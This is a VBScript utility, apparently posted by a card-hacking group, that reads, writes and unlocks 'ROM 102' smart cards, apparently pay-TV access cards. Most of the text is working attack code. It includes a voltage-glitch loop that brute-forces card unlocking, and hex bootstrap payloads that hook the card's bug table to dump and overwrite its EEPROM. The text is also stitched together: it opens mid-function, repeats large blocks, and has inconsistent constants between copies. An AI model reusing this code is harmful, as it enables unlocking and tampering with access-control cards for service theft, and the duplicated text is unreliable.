If ThisByte > 0 And ThisByte Mod 64 = 0 Then


If Address = 12608 Then 'This makes sure we don't overwrite our bug hook
BugOrig = mid(Tmpstr, 113, 12)
Tmp1 = mid(TmpStr, 1, 112)
Tmp2 = mid(TmpStr, 125, 4)
TmpStr = tmp1 & "050060DB9600" & tmp2
End If

If Address = 38400 Then 'This makes sure we don't overwrite our Bootstrap patch
Tmp2 = mid(TmpStr, 29, 100)
TmpStr = "A1FF270187CD5A7D0DFA8080BC80" & Tmp2
End If

BootWrite = "210054A0FFA64BB76B18647180CD7C16" & HexString(Address, 4) & "9240CC7A95" & TmpStr 'Writing EEPROM to card
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("60156057" & BootWrite & "0E10500500")
Sc.Delay(WriteDelay)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes <> 6 Then
Sc.MsgBox("Write Failed at Address: " & hexstring(Address, 4))
Exit Sub
End If

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4) & " " & TmpStr, PBCounter, 288, "Writing to Card...")


TmpStr = ""
Address = Address + 64
PBcounter = PBCounter + 1
If Address = 14336 Then Address = 32768

End If

TmpStr = TmpStr & HexString(Fs.FileGetc(InFile), 2)

Next

BootWrite = "21001AA0FFA64BB76B18647180CD7C1631789206CC7A95" & BugOrig 'Removes Bug hook, and puts original back
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("2415601D" & BootWrite & "500500")
Sc.Delay(100)
Sc.Read(2)
Bytes = Sc.GetByte(1)

'This CMD04 will remove the Bootstrap patch located at $9600
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A00EAE69CC7A9B00000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("76156070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
sc.print bytes & vbcr
Sc.MsgBox ("Temporary write patch could not be removed.")
End If

Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC
Sc.Write("12 0E 05 15 AA" & checkbugs & "50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If Bytes > 4 then
byte1 = Sc.GetByte(0)
byte2 = Sc.GetByte(3)
End If

If byte1 = &h12 and byte2 = &h69 then
Else
Sc.MsgBox ("Temporary write patch could not be removed. Blocker Code is applied to your card.")
End if

Call Sc.ProgressBox("", 0, 256)

If Bytes = 6 Then
Sc.MsgBox("Writing Operation Complete!")
Else
Sc.MsgBox("Could not successfully unhook bug table. Please use unlock function to get back into card.")
End If

Fs.FileClose(Infile)
End Sub

Function GetPacketLen(ByVal Packet)

Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet)

For i = 1 To Length
Temp = Mid(Packet, i, 1)
If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If
Next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function

Sub GetEEPROMFileName()
EEPROMFileName = Fs.FileSaveDialog(FileFilter, "Please select a filename for the saved EEPROM file", "Rom102_Eeprom.bn102")
If EEPROMFileName <> "" Then
OutFileHndl = Fs.FileCreate(EEPROMFileName)
End If
End Sub

Function CheckCard()

Dim Bytes
Dim RomVer
Dim RevVer

CheckCard = 1

Sc.Write("06 10 01 03 50 1A 00")
Sc.Delay(80)
Sc.Read(2)

Bytes = Sc.Getbyte(1)

If Bytes <> &H1B Then
Sc.MsgBox("Invalid or no ATR present.")
CheckCard = 0
Exit Function
Else
Sc.Read(Bytes)
End If

T1 = chr(sc.getbyte(16))
T2 = chr(sc.getbyte(17))
T3 = chr(sc.getbyte(18))
T4 = chr(sc.getbyte(23))
T5 = chr(sc.getbyte(24))
T6 = chr(sc.getbyte(25))
T1 = T1 + T2 + T3
T4 = T4 + T5 + T6

If asc(T4) = 0 Then
T4 = "000"
End If

If T1 <> 102 Then
Sc.MsgBox("This Script only supports ROM 102 cards. Your card does not appear to be a ROM 102.")
CheckCard = 0
Exit Function
End If

If T4 = 109 or T4 = 245 or T4 = 285 Then
Sc.MsgBox("This Script does not support REV: " & T4 & "!")
CheckCard = 0
Exit Function
End If

End Function

Function DoCheckSum(ByVal Packet)

Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

For i = 1 To Length
Temp = Mid(Packet, i, 1)

If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If

Next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

For i = 0 To Length
i = i + 1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum Xor Hex2Dec(Temp) 'Calc Checksum
Next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex string and return it to caller

End Function

Function HexString(ByVal Number, ByVal Length)

' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexadecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen

RetVal = Hex(Number)
CurLen = Len(RetVal)

If CurLen < Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If

HexString = RetVal

End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

If sc.read(4) <> 4 Then
CheckChipVer = 0
Exit Function
End If

If getbyte(0) <> &H4E Then CheckChipVer = 0
If getbyte(1) <> &H44 Then CheckChipVer = 0
If getbyte(2) <> &H31 Then CheckChipVer = 0
If getbyte(3) <> &H33 Then CheckChipVer = 0

End Function

Public Function Hex2Dec(ByVal HexNumber)

' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent

Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function setupunlocker()

Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes

End Function


REV 108

'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'X Rom10X Reader/Writer/Unlocker X
'X For ROM 102 Cards REV 244, 108
'X X
'X XXXXX XX XXXX X
'X XX XX XXX XX XX XXX XX XX XX XX X
'X XX XX XX XX XXX XXX XX XX XX XX XX X
'X XX XX XX XX XX X XX XX XX XX XXX X
'X XXXX XX XX XX XX XX XX XX XXX X
'X XX XX XX XX XX XX XX XX XX XX XX X
'X XX XX XXX XX XX XX XX XX XX XX X
'X XX XX XXXX XXXX X
'X =========================================== X
'X Please Note: Attempt to read your card a few times to make sure that your loader is set up X
'X properly before you attempt to write to your card. USE AT YOUR OWN RISK! X
'X You may loop your CAM!!!!! X
'X Various code snippets used from other scripts posted. Kudos to the Authors.. you know who you X
'X are. X
'X X
'X ROM10X Coder Team X
'X www.rom10x.com X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Const fsoSEEK_SET = 0
Const fsoSEEK_CUR = 1
Const fsoSEEK_END = 2
Const ofOverwritePrompt = &H2 ' Generates a warning message if the user tries to select a file name that is already in use,
Const ofHideReadOnly = &H4 ' Removes the Open As Read Only check box from the dialog.
Const ofPathMustExist = &H800 ' Generates an error message if the user tries to select a file name with a nonexistent directory path.
Const ofFileMustExist = &H1000 ' Generates an error message if the user tries to select a nonexistent file. (only applies to Open dialogs).
Const ofShareAware = &H4000 ' Ignores sharing errors and allows files to be selected even when sharing violations occur.
Const ofEnableSizing = &H800000 ' (Windows 98 and later) Lets the Explorer-style dialog be resized with the mouse or keyboard.
Dim T1
Dim T2
Dim T3
Dim T4
Dim T5
Dim T6
Dim EEPROMFileName
Dim OutFileHndl, FileName, FileHandle
Dim WriteDelay


'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
WriteDelay = 10 'This can be edited to increase delays for slower loaders. Default = 10 X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Sub Main()

Sc.Verbose = false 'set to true to view RX/TX from card

Dim Bytes
Dim Byte1
Dim Byte2
Dim Byte3
Dim Ulock
Dim CS
Dim SFlag
Dim RomVer
Dim RetVal

ClearOutputWindow()

Call SetupUnlocker()

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00")
Sc.Read(2)

Do
RetVal = Sc.ButtonBox("Please choose function to perform:" & vbcrlf & vbcrlf, vbDefaultButton3 + vbCritical, "Rom10X 102 Read/Write/Unlock Utility", "Read Card", "Write Card", "Unlock Card", "Exit")

If RetVal = 0 Or RetVal = 4 Then
Sc.Print ("User Aborted!") & VbCr
Exit Do
End If

If RetVal = 1 Then
Call ReadCard()
End If

If RetVal = 2 Then
Call WriteCard()
End If

If RetVal = 3 Then
Call MethodThree()
End If
Loop
End Sub

Sub MethodThree

Dim BSCLen
Dim CmdToGlitch
Dim CmdTosetup
Dim CTGLen
Dim CTGLen2
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim cRet
Dim RomAddr
Dim PageSet
Dim trys
Dim mix
Dim AVRDelay
Dim AVRCount

clearoutputwindow()

loopctr = 0
AVRCount = 0

If CheckChipVer <> 1 Then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End If

Sc.Verbose = false 'Turn echo on - False = turns it off
VCCStart = &H15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &H00 'h05 is standard, script is auto vcc dont change 02

'================================================= =========================
'================================================= =========================
'User selectable options
'================================================= =========================
'================================================= =========================

DelayStart = &H3800 'Change this to whatever you want
DelayLimit = &H3A50 'This is the limit. it will go back to DelayStart when it reaches here.
GlitchMax = 7 '7 is standard - 7, 8, or 9
GlitchMin = 7 '7 is standard - 6, or 7
trys = 40 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix
AVRDelay = 3 'Minimum = 3 Delay for atmel to wait for a response
'************************************************* **************************
'************************************************* **************************
'******* This Section is FOR ADVANCE USERS ONLY ********
'************************************************* **************************
'************************************************* **************************

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print("Let the 102 Glitching begin...." & VbCr)
Dot = 0
Do
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2))

Sc.Write("06 10 01 03 50 1A 00")
Sc.Read(2)

ATRrsp = Sc.Getbyte(1)

Sc.Read(ATRrsp)
If ATRrsp = &H1B Then
Exit Do
Else
Sc.Write("B0" & HexString(VCC, 2))
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00")
Sc.Read(2)
ATRrsp = Sc.Getbyte(1)
If ATRrsp = &H1B Then
Sc.Read(ATRrsp)
Exit Do
Else
print(VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr)
sc.delay(100)
Sc.Write("04 01 01 01 00")
End If
End If
Loop

Sc.Write("02 15 00")
Sc.Read(2)

Sc.Write("0A 60 04 21 C1 01 80 61 50 04 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write("0B 60 05 21 C1 02 5A 44 FC 50 03 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write ("73 0A 70 8D 00 A7 00 00 00 00 00 00 00 00 00 00 00 00 71 80 18 64 A6 4B B7 6B CD 7C 16 30 C0 A4 02 18 64 CD 7C 16 95 C0 A6 07 18 64 CD 7C 16 31 76 AD 08 20 18 95 BF BF A1 FF 27 01 87 BC 88 01 1E 05 00 60 DB 95 C0 DE CA FE C0 FF EE CD 5A C0 00 B5 0D F8 06 A6 06 B7 64 B7 4C CD 45 05 20 FE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
Sc.Read(2)
Sc.Write ("47 0E" & hexstring(AVRDelay, 2) & "0B 60 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AE BC 20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50 05 00")
Sc.Read(2)
Bytes = Sc.Getbyte(1)
sc.verbose = true
Sc.Read(Bytes)
sc.verbose = false
If Bytes > 3 then
AVRCount = 0
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(3)

If Bytes1 = &hDE And Bytes2 = &HC0 Then
Sc.Write("A1")
Sc.Print(VbCr)
Sc.Print("===========================================" & VbCr)
Sc.Print("Glitch Success!! DE CA FE C0 FF EE" & VbCr)
Sc.Print("Card is Unlocked!!!" & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & " (~" & ((5 / 255) * VCC) & " vdc)" & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("Glitch type " & HexString(GlitchType, 2) & VbCr)
Sc.Print("===========================================" & VbCr)
Exit Sub
Else
If Bytes2 = &H6F Then
sc.print("-")
Else
If Bytes2 = &HFF Then
Sc.Print("+")
Else
sc.print "NoRsp+"
End If
End If
End If

If Bytes1 = &H12 Then
Vcc = Vcc + 0.25
End If
Else
AVRCount = AVRCount + 1
If AVRCount => 5 then
AVRDelay = AVRDelay + 1
Sc.print "Increasing AVR delay to " & hexstring(AVRdelay ,2) & vbcr
AVRCount = 0
End If
End If

VCC = VCC - mix
print("-")
GlitchType = GlitchType - 1
If VCC < VCCLimit Then
VCC = VCCStart
End If
If GlitchType < GlitchMin Then
GlitchType = Glitchmax
End if
loopctr = loopctr + 1
If loopctr > trys Then
clearoutputwindow()
loopctr = 0
Delay = Delay + 1
If Delay > DelayLimit Then
Delay = DelayStart
End If
'end if
Sc.Print("Let the 102 Glitching continue...." & VbCr)
Sc.print("AVR delay = " & hexstring(AVRdelay ,2) & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & VbCr)
Sc.Print(" " & VbCr)
End If
Loop
End Sub

Sub ReadCard()

Dim Bytes
Dim BootStrap
Dim CS
Dim Counter
Dim PBCounter
Dim Address

Address = 12288
PBCounter = 1

Sc.Write("06100103501A00") '-Get ATR
Sc.Delay(80)
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(Bytes)
Sc.Write("021500")
Sc.Read(2)
Sc.Write("0A600421C101A041500400") '-Set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(Bytes)

GetEEPROMFileName()

Do
'Get 64 bytes from Card using "Address" as pointer
BootStrap = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9D7180 CD5AC0" & HexString(Address, 4) & "0DF840B691B74CCD4505CC7A959D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D02"

CS = DoCheckSum(BootStrap) 'Get Checksum of BootStrap string
BootStrap = BootStrap & CS
Sc.Write("77150E036070" & BootStrap & "8700")
Sc.Read(2)
bytes = Sc.GetByte(1)
Sc.Read(bytes)

Sc.Write("1215AA210007A0FF0000024800330E03504000") 'Execute BootStrap String with A0FF intercept
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(bytes)

If Bytes = 0 Then 'Check condition of Atmel after read request
Print(VbCr & "--- Eeprom Read Failed, A0FF intercept is not installed, Or card locked. ---")
Call Sc.MsgBox("--- Eeprom Read Failed, A0FF intercept is not installed ---")
Exit Sub
End If

If Bytes = 65 Then
Counter = Counter + 1

For i = 0 To 63
Call Fs.FilePutc(OutFileHndl, Sc.GetByte(i))
Next

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4), PBCounter, 288, "Saving Eeprom information...")

Address = Address + 64 'increment address pointer by &h40 bytes

If Address = 14336 Then 'If address gets to $3800 then change it to $8000
Address = 32768
End If

PBCounter = PBCounter + 1 'Increment the progressbar

If Address = 49152 Then Exit Do 'If we're at the end, then exit
End If
Loop
Call Sc.ProgressBox("", 0, 256) 'close the progressbar

Fs.FileClose(OutFileHndl) 'close the file
Sc.MsgBox("Reading Complete!")
End Sub

Sub WriteCard()

Dim CheckBugs
Dim BugOrig
Dim InFile
Dim FileName
Dim FileSize
Dim ThisByte
Dim TmpStr
Dim Outfile
Dim CC
Dim Address
Dim Bytes
Dim PBCounter
Dim Tmp1
Dim Tmp2

Address = 12416
PBCounter = 1
'---------------------------------------------------------------------------------------------
Const FileFilter = "All Eprom Files (*.bn102, *.bin)|*.bn102;*.bin;|Bin Files (*.bn102)|*.bn102|Bin Files (*.bin)|*.bin"

FileName = Fs.FileOpenDialog(FileFilter, "Please select a valid bin file", "Default.bn102", ofPathMustExist + ofFileMustExist + ofHideReadOnly + ofEnableSizing)
If FileName <> "" Then
If Fs.FileExists(FileName) = 0 Then
Sc.MsgBox("The file does not exist")
Else
InFile = Fs.FileOpen(FileName, fsoOpenRead)
End If
End If

FileSize = Fs.FileSeek(InFile, 0, fsoSEEK_END)

If FileSize <> 18432 Then
Sc.MsgBox("This file does not appear to be a valid ROM 102 EEPROM file")
Exit Sub
End If

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00") 'set baud
Sc.Read(2)

Sc.Write("0A600421C101A041500400") '-set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

'This CMD 04 Gets the original value of the first bugtable entry.
'We are going to hook here, so we need to know what was originally there, so we can replace
'after we're finished writing.
CheckBugs = ("21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D 71 80 CD 5A C0 31 78 0D F8 06 B6 91 B7 4C CD 45 05 CC 7A 95 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 02")
CC = Dochecksum(CheckBugs) 'calculates the checksum byte
CheckBugs = CheckBugs & CC 'adds the checksum byte at the end of our string

Sc.Write("77150E036070" & CheckBugs & "8700") 'sends our string
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 0B 00") 'executes our string with the A0FF intercept
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes = &HC Then
T1 = Sc.Getbyte(0)
T2 = Sc.Getbyte(1)
T3 = Sc.Getbyte(2)
T4 = Sc.Getbyte(3)
T5 = Sc.Getbyte(4)
T6 = Sc.Getbyte(5)
'This variable stores the original Bugtable code, which will be replaced when we're finished writing
'BugOrig = hexstring(T1, 2) & hexstring(T2, 2) & hexstring(T3, 2) & hexstring(T4, 2) & hexstring(T5, 2) & Hexstring(T6, 2)
Else
Sc.Msgbox("The Card appears to be locked")
Exit Sub
End If

'This CMD 04 will write our Bootstrap patch located at $9600
BootWrite = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A010CC7A95000000000000A1FF27 0187CD5A7D0DFA8080BC800000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002"


CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("77150E036070" & BootWrite & "8700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If bytes <> 8 Then
Sc.MsgBox("Write Failed")
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
'This CMD 04 will hook our Bugtable at $3178 = "050060DB9600" (This will later be replaced with original value)
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C163178A006CC7A95000000000000050060 DB960000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("756070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

Byte1 = Sc.Getbyte(0)
Byte2 = Sc.getbyte(3)

If Byte1 = &H12 And Byte2 = &H90 Then
Else
sc.msgbox("Write Failed!")
Exit Sub
End If

'-------------------------------------------------------------------------
Call Fs.FileSeek(InFile, FileSize - (FileSize - &H80), fsoSEEK_SET)

TmpStr = ""
For ThisByte = 0 To 18304
If ThisByte > 0 And ThisByte Mod 64 = 0 Then


If Address = 12608 Then 'This makes sure we don't overwrite our bug hook
BugOrig = mid(Tmpstr, 113, 12)
Tmp1 = mid(TmpStr, 1, 112)
Tmp2 = mid(TmpStr, 125, 4)
TmpStr = tmp1 & "050060DB9600" & tmp2
End If

If Address = 38400 Then 'This makes sure we don't overwrite our Bootstrap patch
Tmp2 = mid(TmpStr, 29, 100)
TmpStr = "A1FF270187CD5A7D0DFA8080BC80" & Tmp2
End If

BootWrite = "210054A0FFA64BB76B18647180CD7C16" & HexString(Address, 4) & "9240CC7A95" & TmpStr 'Writing EEPROM to card
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("60156057" & BootWrite & "0E10500500")
Sc.Delay(WriteDelay)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes <> 6 Then
Sc.MsgBox("Write Failed at Address: " & hexstring(Address, 4))
Exit Sub
End If

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4) & " " & TmpStr, PBCounter, 288, "Writing to Card...")


TmpStr = ""
Address = Address + 64
PBcounter = PBCounter + 1
If Address = 14336 Then Address = 32768

End If

TmpStr = TmpStr & HexString(Fs.FileGetc(InFile), 2)

Next

BootWrite = "21001AA0FFA64BB76B18647180CD7C1631789206CC7A95" & BugOrig 'Removes Bug hook, and puts original back
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("2415601D" & BootWrite & "500500")
Sc.Delay(100)
Sc.Read(2)
Bytes = Sc.GetByte(1)

'This CMD04 will remove the Bootstrap patch located at $9600
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A00EAE69CC7A9B00000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("76156070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
sc.print bytes & vbcr
Sc.MsgBox ("Temporary write patch could not be removed.")
End If

Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC
Sc.Write("12 0E 05 15 AA" & checkbugs & "50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If Bytes > 4 then
byte1 = Sc.GetByte(0)
byte2 = Sc.GetByte(3)
End If

If byte1 = &h12 and byte2 = &h69 then
Else
Sc.MsgBox ("Temporary write patch could not be removed. Blocker Code is applied to your card.")
End if

Call Sc.ProgressBox("", 0, 256)

If Bytes = 6 Then
Sc.MsgBox("Writing Operation Complete!")
Else
Sc.MsgBox("Could not successfully unhook bug table. Please use unlock function to get back into card.")
End If

Fs.FileClose(Infile)
End Sub

Function GetPacketLen(ByVal Packet)

Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet)

For i = 1 To Length
Temp = Mid(Packet, i, 1)
If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If
Next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function

Sub GetEEPROMFileName()
EEPROMFileName = Fs.FileSaveDialog(FileFilter, "Please select a filename for the saved EEPROM file", "Rom102_Eeprom.bn102")
If EEPROMFileName <> "" Then
OutFileHndl = Fs.FileCreate(EEPROMFileName)
End If
End Sub

Function CheckCard()

Dim Bytes
Dim RomVer
Dim RevVer

CheckCard = 1

Sc.Write("06 10 01 03 50 1A 00")
Sc.Delay(80)
Sc.Read(2)

Bytes = Sc.Getbyte(1)

If Bytes <> &H1B Then
Sc.MsgBox("Invalid or no ATR present.")
CheckCard = 0
Exit Function
Else
Sc.Read(Bytes)
End If

T1 = chr(sc.getbyte(16))
T2 = chr(sc.getbyte(17))
T3 = chr(sc.getbyte(18))
T4 = chr(sc.getbyte(23))
T5 = chr(sc.getbyte(24))
T6 = chr(sc.getbyte(25))
T1 = T1 + T2 + T3
T4 = T4 + T5 + T6

If asc(T4) = 0 Then
T4 = "000"
End If

If T1 <> 102 Then
Sc.MsgBox("This Script only supports ROM 102 cards. Your card does not appear to be a ROM 102.")
CheckCard = 0
Exit Function
End If

If T4 = 109 or T4 = 245 or T4 = 286 Then
Sc.MsgBox("This Script does not support REV: " & T4 & "!")
CheckCard = 0
Exit Function
End If

End Function

Function DoCheckSum(ByVal Packet)

Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

For i = 1 To Length
Temp = Mid(Packet, i, 1)

If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If

Next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

For i = 0 To Length
i = i + 1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum Xor Hex2Dec(Temp) 'Calc Checksum
Next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex string and return it to caller

End Function

Function HexString(ByVal Number, ByVal Length)

' This function takes 2 arguments, a number and a length. It converts the decimal
